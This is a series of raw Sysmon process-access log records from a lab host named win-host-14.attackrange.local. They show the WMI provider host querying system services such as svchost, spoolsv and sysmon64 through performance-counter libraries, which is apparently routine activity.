21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150757Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150756Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150755Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150754Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150753Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150752Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150751Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150750Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150749Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150748Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150747Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150746Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150745Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150744Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150743Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150742Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 